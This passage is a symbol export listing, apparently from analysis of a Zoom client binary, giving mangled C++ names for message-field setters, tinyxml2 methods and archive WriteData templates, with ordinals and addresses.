              ?Set_sessionType@CSBMBMessage_ShareMeetingChatRsp@@QAEXABH@Z57010x417bf0
              ?Set_sha256sum@CSBMBMessage_MeetingWallpaperStartDownload@@QAEXABV?$CStringT@_W@Cmm@@@Z57020x417f40
              ?Set_sha256sum@CSBMBMessage_MeetingWallpaperThumbStartDownload@@QAEXABV?$CStringT@_W@Cmm@@@Z57030x417f40
              ?Set_shareAction@CSBMBMessage_ShareMeetingChatRsp@@QAEXABH@Z57040x40c800
              ?Set_shareFMName@CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z57050x418b90
              ?Set_shareResult@CSBMBMessage_ShareMeetingChatRsp@@QAEXABH@Z57060x425c20
              ?Set_sharing_role@CSBMBMessage_NotifyStartDocsShare@@QAEXABV?$CStringT@_W@Cmm@@@Z57070x417f10
              ?Set_sharing_role@CSBMBMessage_NotifyStartWhiteboardShare@@QAEXABI@Z57080x417560
              ?Set_showAvatar@CSBMBMessage_HuddlesOnShowAvatarStateChange@@QAEXABH@Z57090x40c800
              ?Set_showState@CSBMBMessage_CCIVideoShowEmbedWindowRequest@@QAEXABH@Z57100x417560
              ?Set_signalType@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@QAEXABI@Z57110x417bf0
              ?Set_signalType@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEXABI@Z57120x418e60
              ?Set_signalType@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Request@@QAEXABI@Z57130x417bf0
              ?Set_signalType@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Response@@QAEXABI@Z57140x418e60
              ?Set_signalType@CSBMBMessage_Assistant_DAL_Service_Set_Selected_Device_Request@@QAEXABI@Z57150x41af30
              ?Set_signalType@CSBMBMessage_Assistant_DAL_Service_Set_Selected_Device_Response@@QAEXABI@Z57160x41af30
              ?Set_smallUrl@CSBMBMessage_NotifyUserPropertiesChanged@@QAEXABV?$CStringT@_W@Cmm@@@Z57170x40c890
              ?Set_smapleRate@CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterResponse@@QAEXABI@Z57180x418d20
              ?Set_source@CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAEXABI@Z57190x418d20
              ?Set_source@CSBMBMessage_InviteeIakRequest@@QAEXABH@Z57200x417560
              ?Set_source@CSBMBMessage_RequestUpdateAICAdminSetting@@QAEXABH@Z57210x419a80
              ?Set_sourceType@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@QAEXABI@Z57220x419080
              ?Set_sourceType@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEXABI@Z57230x4185e0
              ?Set_sourceType@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Request@@QAEXABI@Z57240x418e60
              ?Set_sourceType@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Response@@QAEXABI@Z57250x419080
              ?Set_speakerID@CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAEXABI@Z57260x417560
              ?Set_star@CSBMBMessage_VCardSetBuddyStar@@QAEXABH@Z57270x417560
              ?Set_start@CSBMBMessage_Assistant_Voice_Command_Start_Request@@QAEXABH@Z57280x40c800
              ?Set_status@CSBMBMessage_Assistant_DAL_Service_Get_Service_Status_Response@@QAEXABI@Z57290x40c800
              ?Set_status@CSBMBMessage_Assistant_Voice_Command_Status_Notification@@QAEXABH@Z57300x417bf0
              ?Set_status@CSBMBMessage_CCIVideoEndDropdownButtonClickConfirmRequest@@QAEXABV?$CStringT@D@Cmm@@@Z57310x40c9b0
              ?Set_status@CSBMBMessage_NotifyConferenceStatus@@QAEXABI@Z57320x418740
              ?Set_status@CSBMBMessage_NotifyMeetingWallpaperDownloadStatus@@QAEXABH@Z57330x419a80
              ?Set_status@CSBMBMessage_NotifyPTDeviceInfo@@QAEXABI@Z57340x417bf0
              ?Set_status@CSBMBMessage_NotifyVideoLayoutDownloadStatus@@QAEXABH@Z57350x40c800
              ?Set_str@CSBMBMessage_MeetingDiagInfo@@QAEXABV?$CStringT@D@Cmm@@@Z57360x40c9b0
              ?Set_strCallId@CSBMBMessage_StartCallOutInfo@@QAEXABV?$CStringT@_W@Cmm@@@Z57370x41af80
              ?Set_strCommand@CSBMBMessage_CCIVideoReceiveCommandNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z57380x40c890
              ?Set_strCommand@CSBMBMessage_CCIVideoSendCommandRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z57390x417f10
              ?Set_strCustomerId@CSBMBMessage_CCIVideoChangeHostRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z57400x40c890
              ?Set_strCustomerId@CSBMBMessage_CCIVideoSendCommandRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z57410x40c890
              ?Set_strData@CSBMBMessage_CCIVideoUserDataUpdateNotify@@QAEXABV?$CStringT@D@Cmm@@@Z57420x40c9b0
              ?Set_strDefaultProfile@CSBMBMessage_OutlookOnGetDefaultProfileNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z57430x40c890
              ?Set_strEngagementId@CSBMBMessage_CCIScreenRecordingRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z57440x418bb0
              ?Set_strJsCallId@CSBMBMessage_CCIScreenRecordingNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z57450x40c810
              ?Set_strJsCallId@CSBMBMessage_CCIScreenRecordingRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z57460x418b80
              ?Set_strJson@CSBMBMessage_CCIVideoJoinMeetingRequest@@QAEXABV?$CStringT@D@Cmm@@@Z57470x40c9b0
              ?Set_strJsonEvents@CSBMBMessage_OutlookGetMAPICalendarEvents@@QAEXABV?$CStringT@D@Cmm@@@Z57480x40c9b0
              ?Set_strMsg@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgReceived@@QAEXABV?$CStringT@_W@Cmm@@@Z57490x40c890
              ?Set_strResult@CSBMBMessage_CCIVideoWarmTransferNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z57500x40c890
              ?Set_strSessionId@CSBMBMessage_CCIScreenRecordingNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z57510x418b90
              ?Set_strSessionName@CSBMBMessage_CCIScreenRecordingNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z57520x418b80
              ?Set_strSpokenLangName@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgError@@QAEXABV?$CStringT@_W@Cmm@@@Z57530x40c810
              ?Set_strStatus@CSBMBMessage_CCIVideoHoldStatusChangeNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z57540x40c890
              ?Set_strStatus@CSBMBMessage_CCIVideoWarmTransferRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z57550x40c890
              ?Set_strToken@CSBMBMessage_CCIScreenRecordingRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z57560x40c810
              ?Set_strTpc@CSBMBMessage_CCIScreenRecordingRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z57570x418b90
              ?Set_strTranscriptLangName@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgError@@QAEXABV?$CStringT@_W@Cmm@@@Z57580x41a5f0
              ?Set_strType@CSBMBMessage_Notify_ZPNS_MeetingStart@@QAEXABV?$CStringT@_W@Cmm@@@Z57590x40c890
              ?Set_strUserId@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgReceived@@QAEXABV?$CStringT@_W@Cmm@@@Z57600x417f10
              ?Set_strUserId@CSBMBMessage_CCIVideoWarmTransferRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z57610x417f10
              ?Set_strUserName@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgReceived@@QAEXABV?$CStringT@_W@Cmm@@@Z57620x417f20
              ?Set_subConfType@CSBMBMessage_ConfirmConfLeave@@QAEXABI@Z57630x419c70
              ?Set_subHasError@CSBMBMessage_ConfirmConfLeave@@QAEXABH@Z57640x419c40
              ?Set_subSdkError@CSBMBMessage_ConfirmConfLeave@@QAEXABI@Z57650x419ca0
              ?Set_success@CSBMBMessage_CameraControlGroupFetched@@QAEXABH@Z57660x417560
              ?Set_success@CSBMBMessage_CameraControlGroupRemoved@@QAEXABH@Z57670x417560
              ?Set_success@CSBMBMessage_ComponentDownloadResult@@QAEXABH@Z57680x417bf0
              ?Set_success@CSBMBMessage_PSComponentDownloadResult@@QAEXABH@Z57690x417bf0
              ?Set_text@CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAEXABV?$CStringT@_W@Cmm@@@Z57700x418b90
              ?Set_text@CSBMBMessage_CCIVideoSetEndButtonTextRequest@@QAEXABV?$CStringT@D@Cmm@@@Z57710x40c9b0
              ?Set_threadId@CSBMBMessage_PMCOpenTeamChatReq@@QAEXABV?$CStringT@_W@Cmm@@@Z57720x418bb0
              ?Set_threadSvrTime@CSBMBMessage_PMCOpenTeamChatReq@@QAEXAB_J@Z57730x426200
              ?Set_thumbnailUrl@CSBMBMessage_NotifyShareFileInMeetingChat@@QAEXABV?$CStringT@_W@Cmm@@@Z57740x417f40
              ?Set_thumbnail_path@CSBMBMessage_SaveCustom3DAvatarToWeb@@QAEXABV?$CStringT@_W@Cmm@@@Z57750x41b460
              ?Set_thumbnail_path@CSBMBMessage_UpdateCustom3DAvatarToWeb@@QAEXABV?$CStringT@_W@Cmm@@@Z57760x41b460
              ?Set_timeStamp@CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAEXAB_J@Z57770x422e60
              ?Set_timeout_seconds@CSBMBMessage_MediaAPIRequest@@QAEXABI@Z57780x419a80
              ?Set_title@CSBMBMessage_Assistant_Voice_Command_UI_Update_Request@@QAEXABV?$CStringT@D@Cmm@@@Z57790x418370
              ?Set_title@CSBMBMessage_MeetingWallpaperStartDownload@@QAEXABV?$CStringT@_W@Cmm@@@Z57800x417f10
              ?Set_title@CSBMBMessage_MeetingWallpaperThumbStartDownload@@QAEXABV?$CStringT@_W@Cmm@@@Z57810x417f10
              ?Set_tmServerside@CSBMBMessage_NotifyMeetingCallResponse@@QAEXAB_J@Z57820x422e60
              ?Set_to_WindowId@CSBMBMessage_CCIVideoEmbedWindowSendMsgRequest@@QAEXABV?$CStringT@D@Cmm@@@Z57830x41a2d0
              ?Set_to_WindowId@CSBMBMessage_CCIVideoOnEmbedWindowSendMsgRequest@@QAEXABV?$CStringT@D@Cmm@@@Z57840x41a2d0
              ?Set_toggle@CSBMBMessage_MeetingPAAPToggleEvent@@QAEXABH@Z57850x417560
              ?Set_token@CSBMBMessage_CompanionTokenResponse@@QAEXABV?$CStringT@D@Cmm@@@Z57860x41bc80
              ?Set_token@CSBMBMessage_InviteZoomPhoneTokenResponse@@QAEXABV?$CStringT@D@Cmm@@@Z57870x41a2d0
              ?Set_token@CSBMBMessage_PairRelationTokenResponse@@QAEXABV?$CStringT@D@Cmm@@@Z57880x418380
              ?Set_top@CSBMBMessage_PMCOpenTeamChatReq@@QAEXABH@Z57890x426250
              ?Set_trackingId@CSBMBMessage_LeaveBeforeMeetingStartNotify@@QAEXABV?$CStringT@D@Cmm@@@Z57900x420a00
              ?Set_txChannelCounts@CSBMBMessage_Assistant_DAL_Service_Load_Service_Request@@QAEXABH@Z57910x418d20
              ?Set_txChannelCounts@CSBMBMessage_Assistant_DAL_Service_Service_Ready_Notification@@QAEXABH@Z57920x41f240
              ?Set_txChannelID@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@QAEXABH@Z57930x418e60
              ?Set_txChannelID@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEXABH@Z57940x419080
              ?Set_txChannelID@CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Request@@QAEXABH@Z57950x40c800
              ?Set_txChannelID@CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Response@@QAEXABH@Z57960x417bf0
              ?Set_type@CSBMBMessage_Assistant_Voice_Command_Data_Request@@QAEXABH@Z57970x40c800
              ?Set_type@CSBMBMessage_Assistant_Voice_Command_Data_Response@@QAEXABH@Z57980x40c800
              ?Set_type@CSBMBMessage_Assistant_Voice_Command_Status_Notification@@QAEXABH@Z57990x40c800
              ?Set_type@CSBMBMessage_Assistant_Voice_Command_UI_Update_Request@@QAEXABH@Z58000x40c800
              ?Set_type@CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAEXABI@Z58010x422e80
              ?Set_type@CSBMBMessage_CCIVideoSetEndButtonTextRequest@@QAEXABV?$CStringT@D@Cmm@@@Z58020x41a2d0
              ?Set_type@CSBMBMessage_NotifyCustom3DAvatarFileIdUpdated@@QAEXABH@Z58030x40c800
              ?Set_type@CSBMBMessage_NotifyMeetingCustom3DAvatarElementThumbnailDownloaded@@QAEXABH@Z58040x40c800
              ?Set_type@CSBMBMessage_NotifyMeetingFaceMakeupDownloaded@@QAEXABH@Z58050x40c800
              ?Set_type@CSBMBMessage_NotifyMeetingWallpaperDownloadStatus@@QAEXABH@Z58060x417560
              ?Set_type@CSBMBMessage_NotifyPTDeviceInfo@@QAEXABI@Z58070x40c800
              ?Set_type@CSBMBMessage_NotifyShareFileInMeetingChat@@QAEXABV?$CStringT@_W@Cmm@@@Z58080x418170
              ?Set_type@CSBMBMessage_PS_UpdateAccountInfo@@QAEXABH@Z58090x40c800
              ?Set_type@CSBMBMessage_PS_UpdateKeyValueInfo@@QAEXABH@Z58100x40c800
              ?Set_type@CSBMBMessage_RemoveCustom3DAvatarToWeb@@QAEXABH@Z58110x40c800
              ?Set_type@CSBMBMessage_SaveCustom3DAvatarToWeb@@QAEXABH@Z58120x40c800
              ?Set_type@CSBMBMessage_TrackingPAAPEvent@@QAEXABH@Z58130x417560
              ?Set_type@CSBMBMessage_UpdateCustom3DAvatarToWeb@@QAEXABH@Z58140x40c800
              ?Set_url@CSBMBMessage_CCIVideoOpenURLWithDefaultBrowser@@QAEXABV?$CStringT@D@Cmm@@@Z58150x40c9b0
              ?Set_url@CSBMBMessage_MeetingWallpaperStartDownload@@QAEXABV?$CStringT@_W@Cmm@@@Z58160x417f20
              ?Set_url@CSBMBMessage_MeetingWallpaperThumbStartDownload@@QAEXABV?$CStringT@_W@Cmm@@@Z58170x417f20
              ?Set_url@CSBMBMessage_NotifyMeetingImageDownloaded@@QAEXABV?$CStringT@_W@Cmm@@@Z58180x40c890
              ?Set_url@CSBMBMessage_RequestMyIDPToken@@QAEXABV?$CStringT@_W@Cmm@@@Z58190x417f20
              ?Set_url@CSBMBMessage_ZoomInternalNavigateURLEvent@@QAEXABV?$CStringT@_W@Cmm@@@Z58200x40c890
              ?Set_userData@CSBMBMessage_NotifyMeetingImageDownloaded@@QAEXABH@Z58210x41aef0
              ?Set_userDeviceID@CSBMBMessage_NotifyConfPListChanged@@QAEXABV?$CStringT@_W@Cmm@@@Z58220x418b90
              ?Set_userEmail@CSBMBMessage_NotifyPTCleanIDPToken@@QAEXABV?$CStringT@_W@Cmm@@@Z58230x417f10
              ?Set_userEmail@CSBMBMessage_RequestMyIDPToken@@QAEXABV?$CStringT@_W@Cmm@@@Z58240x418170
              ?Set_userFBID@CSBMBMessage_NotifyConfPListChanged@@QAEXABV?$CStringT@_W@Cmm@@@Z58250x418b80
              ?Set_userFMName@CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterResponse@@QAEXABV?$CStringT@_W@Cmm@@@Z58260x418b80
              ?Set_userID@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@QAEXABH@Z58270x40c800
              ?Set_userID@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEXABH@Z58280x417bf0
              ?Set_userID@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Request@@QAEXABH@Z58290x40c800
              ?Set_userID@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Response@@QAEXABH@Z58300x417bf0
              ?Set_userID@CSBMBMessage_NotifyPTCleanIDPToken@@QAEXABV?$CStringT@_W@Cmm@@@Z58310x40c890
              ?Set_userID@CSBMBMessage_RequestMyIDPToken@@QAEXABV?$CStringT@_W@Cmm@@@Z58320x418140
              ?Set_userId@CSBMBMessage_CCIVideoAssignAndNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z58330x40c890
              ?Set_userName@CSBMBMessage_LeaveBeforeMeetingStartNotify@@QAEXABV?$CStringT@D@Cmm@@@Z58340x41d7e0
              ?Set_userZoomID@CSBMBMessage_UserInTrustListInfo@@QAEXABV?$CStringT@D@Cmm@@@Z58350x40c9b0
              ?Set_user_guid@CSBMBMessage_ConfGetZRMeetingInfoReq@@QAEXABV?$CStringT@_W@Cmm@@@Z58360x40c890
              ?Set_user_input@CSBMBMessage_ConfirmRecaptcha@@QAEXABV?$CStringT@_W@Cmm@@@Z58370x40c890
              ?Set_user_zoom_id@CSBMBMessage_VCardDataRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z58380x40c890
              ?Set_user_zoom_id@CSBMBMessage_VCardFetchManagerInfo@@QAEXABV?$CStringT@_W@Cmm@@@Z58390x40c890
              ?Set_user_zoom_id@CSBMBMessage_VCardSetBuddyStar@@QAEXABV?$CStringT@_W@Cmm@@@Z58400x40c890
              ?Set_value@CSBMBMessage_MeshNotification@@QAEXABV?$CStringT@D@Cmm@@@Z58410x418370
              ?Set_value@CSBMBMessage_PS_UpdateKeyValueInfo@@QAEXABV?$CStringT@_W@Cmm@@@Z58420x418b80
              ?Set_value@CSBMBMessage_RequestUpdateAICAdminSetting@@QAEXABH@Z58430x417560
              ?Set_videoEvent@CSBMBMessage_CCIVideoEventReportNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z58440x40c890
              ?Set_wParam@CSBMBMessage_InviteWinStatus@@QAEXABI@Z58450x418e60
              ?Set_wallpaper_id@CSBMBMessage_MeetingWallpaperStartDownload@@QAEXABV?$CStringT@_W@Cmm@@@Z58460x40c890
              ?Set_wallpaper_id@CSBMBMessage_MeetingWallpaperThumbStartDownload@@QAEXABV?$CStringT@_W@Cmm@@@Z58470x40c890
              ?Set_wallpaper_id@CSBMBMessage_NotifyMeetingWallpaperDownloadStatus@@QAEXABV?$CStringT@_W@Cmm@@@Z58480x40c890
              ?Set_webClientUrl@CSBMBMessage_LeaveConfErrorDesc@@QAEXABV?$CStringT@_W@Cmm@@@Z58490x418bb0
              ?Set_web_record_info@CSBMBMessage_PS_PSAsyncRecordingUploadResult@@QAEXABV?$CStringT@_W@Cmm@@@Z58500x418b80
              ?Set_web_record_info@CSBMBMessage_PS_PTReturnAsyncRecordingActionToken@@QAEXABV?$CStringT@_W@Cmm@@@Z58510x40c810
              ?Set_whiteboardUrlRegular@CSBMBMessage_NotifyPTLoginInfo@@QAEXABV?$CStringT@D@Cmm@@@Z58520x41a180
              ?Set_width@CSBMBMessage_PMCOpenTeamChatReq@@QAEXABH@Z58530x426280
              ?Set_windowId@CSBMBMessage_CCIVideoCreateEmbedWindowNotify@@QAEXABV?$CStringT@D@Cmm@@@Z58540x418380
              ?Set_windowId@CSBMBMessage_CCIVideoDestroyEmbedWindowNotify@@QAEXABV?$CStringT@D@Cmm@@@Z58550x418380
              ?Set_windowId@CSBMBMessage_CCIVideoShowEmbedWindowNotify@@QAEXABV?$CStringT@D@Cmm@@@Z58560x418380
              ?Set_workflowUrlRegualr@CSBMBMessage_NotifyPTLoginInfo@@QAEXABV?$CStringT@_W@Cmm@@@Z58570x41a150
              ?Set_workvivoDomain@CSBMBMessage_NotifyPTLoginInfo@@QAEXABV?$CStringT@D@Cmm@@@Z58580x41a0c0
              ?Set_zoomDocsUrlRegular@CSBMBMessage_NotifyPTLoginInfo@@QAEXABV?$CStringT@_W@Cmm@@@Z58590x41a120
              ?Set_zr_userid@CSBMBMessage_NotifyConfZRMeetingInfo@@QAEXABH@Z58600x417bf0
              ?ShallowClone@XMLComment@tinyxml2@@UBEPAVXMLNode@2@PAVXMLDocument@2@@Z58610x460c80
              ?ShallowClone@XMLDeclaration@tinyxml2@@UBEPAVXMLNode@2@PAVXMLDocument@2@@Z58620x460d80
              ?ShallowClone@XMLDocument@tinyxml2@@UBEPAVXMLNode@2@PAV12@@Z58630x454b60
              ?ShallowClone@XMLElement@tinyxml2@@UBEPAVXMLNode@2@PAVXMLDocument@2@@Z58640x462000
              ?ShallowClone@XMLText@tinyxml2@@UBEPAVXMLNode@2@PAVXMLDocument@2@@Z58650x460b70
              ?ShallowClone@XMLUnknown@tinyxml2@@UBEPAVXMLNode@2@PAVXMLDocument@2@@Z58660x460e80
              ?ShallowEqual@XMLComment@tinyxml2@@UBE_NPBVXMLNode@2@@Z58670x460ca0
              ?ShallowEqual@XMLDeclaration@tinyxml2@@UBE_NPBVXMLNode@2@@Z58680x460da0
              ?ShallowEqual@XMLDocument@tinyxml2@@UBE_NPBVXMLNode@2@@Z58690x454b70
              ?ShallowEqual@XMLElement@tinyxml2@@UBE_NPBVXMLNode@2@@Z58700x462060
              ?ShallowEqual@XMLText@tinyxml2@@UBE_NPBVXMLNode@2@@Z58710x460ba0
              ?ShallowEqual@XMLUnknown@tinyxml2@@UBE_NPBVXMLNode@2@@Z58720x460ea0
              ?Signal@CEvent@Cmm@@QAEXXZ58730x40c270
              ?WriteData@?$CmmMessageTemplate_6@HV?$CStringT@D@Cmm@@V12@V12@HV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62180x429ea0
              ?WriteData@?$CmmMessageTemplate_6@HV?$CStringT@_W@Cmm@@V12@V12@HH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62190x42f3a0
              ?WriteData@?$CmmMessageTemplate_6@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62200x42e0b0
              ?WriteData@?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@IV12@V12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62210x42d510
              ?WriteData@?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@V12@V12@II@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62220x42c080
              ?WriteData@?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62230x42ee00
              ?WriteData@?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@V12@V12@V12@_J@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62240x428860
              ?WriteData@?$CmmMessageTemplate_6@V?$CStringT@D@Cmm@@HV12@V12@V12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62250x42bc10
              ?WriteData@?$CmmMessageTemplate_6@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62260x42c7c0
              ?WriteData@?$CmmMessageTemplate_6@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@V32@V32@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62270x429960
              ?WriteData@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@HHHHH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62280x429c30
              ?WriteData@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@HIIV12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62290x42a9b0
              ?WriteData@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@IHIHV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62300x42eb60
              ?WriteData@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@IV12@V12@II@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62310x42a210
              ?WriteData@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62320x428f00
              ?WriteData@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@HHHH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62330x42cf90
              ?WriteData@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@V12@V12@HH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62340x4284a0
              ?WriteData@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62350x4296b0
              ?WriteData@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62360x42fa40
              ?WriteData@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62370x42f1a0
              ?WriteData@?$CmmMessageTemplate_6@_JV?$CStringT@D@Cmm@@IV12@V12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62380x42b5d0
              ?WriteData@?$CmmMessageTemplate_6@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62390x42aee0
              ?WriteData@?$CmmMessageTemplate_6@_JV?$CStringT@_W@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62400x42d240
              ?WriteData@?$CmmMessageTemplate_7@HHHHV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62410x42a480
              ?WriteData@?$CmmMessageTemplate_7@HHHV?$CStringT@_W@Cmm@@V12@HV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62420x42cad0
              ?WriteData@?$CmmMessageTemplate_7@HHHV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62430x4290a0
              ?WriteData@?$CmmMessageTemplate_7@HV?$CStringT@D@Cmm@@V12@V12@HV12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62440x429dd0
              ?WriteData@?$CmmMessageTemplate_7@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62450x42dfa0
              ?WriteData@?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@III@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62460x42bfb0
              ?WriteData@?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@V12@V12@I@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62470x42ed30
              ?WriteData@?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@V12@_JV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62480x428750
              ?WriteData@?$CmmMessageTemplate_7@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62490x42c6b0
              ?WriteData@?$CmmMessageTemplate_7@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@V32@V32@V32@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62500x429850
              ?WriteData@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@HHHHHH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62510x429b60
              ?WriteData@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@HIIV12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62520x42a8a0
              ?WriteData@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IHIHV12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62530x42ea90
              ?WriteData@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IV12@V12@II_J@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62540x42a140
              ?WriteData@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_J@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62550x428e30
              ?WriteData@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@HHHHV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62560x42ce80
              ?WriteData@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62570x4295e0
              ?WriteData@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62580x42f930
              ?WriteData@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62590x42f0d0
              ?WriteData@?$CmmMessageTemplate_7@_JV?$CStringT@D@Cmm@@IV12@V12@HH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62600x42b500
